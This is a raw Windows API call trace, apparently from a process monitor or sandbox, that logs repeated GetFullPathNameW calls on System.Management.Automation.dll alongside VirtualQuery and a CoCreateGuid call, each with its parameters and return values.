	[0382.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.589] VirtualQuery (in: lpAddress=0x24b0e0, lpBuffer=0x24bfa0, dwLength=0x30 | out: lpBuffer=0x24bfa0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.590] VirtualQuery (in: lpAddress=0x24b170, lpBuffer=0x24c030, dwLength=0x30 | out: lpBuffer=0x24c030*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.592] VirtualQuery (in: lpAddress=0x24b8f0, lpBuffer=0x24c7b0, dwLength=0x30 | out: lpBuffer=0x24c7b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.937] VirtualQuery (in: lpAddress=0x24b8f0, lpBuffer=0x24c7b0, dwLength=0x30 | out: lpBuffer=0x24c7b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.939] VirtualQuery (in: lpAddress=0x24b8f0, lpBuffer=0x24c7b0, dwLength=0x30 | out: lpBuffer=0x24c7b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.940] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.940] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.940] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.940] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.941] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.941] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.941] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.941] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.941] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.941] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.942] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.942] VirtualQuery (in: lpAddress=0x24b520, lpBuffer=0x24c3e0, dwLength=0x30 | out: lpBuffer=0x24c3e0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.942] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.942] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.942] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.943] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.943] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xa0a635ce, Data2=0xb7b6, Data3=0x49cf, Data4=([0]=0xa3, [1]=0x2e, [2]=0x30, [3]=0x3b, [4]=0x68, [5]=0x9, [6]=0x48, [7]=0xf6))) returned 0x0
	[0382.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
